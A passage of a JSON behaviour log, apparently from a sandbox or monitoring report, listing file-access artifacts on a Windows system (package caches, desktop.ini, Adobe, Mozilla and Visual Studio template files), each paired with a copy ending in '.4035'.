"c:\\users\\public\\libraries\\recordedtv.library-ms.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", "hashes": [], "norm_filename": "c:\\users\\public\\libraries\\recordedtv.library-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Downloads\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\downloads\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", "hashes": [], "norm_filename": "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", "hashes": [], "norm_filename": "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\BIT5D7A.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\bit5d7a.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\BIT5D7A.tmp", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\bit5d7a.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.4035", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\desktop.ini", "hashes": [], "norm_filename": "c:\\program files (x86)\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\updater.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 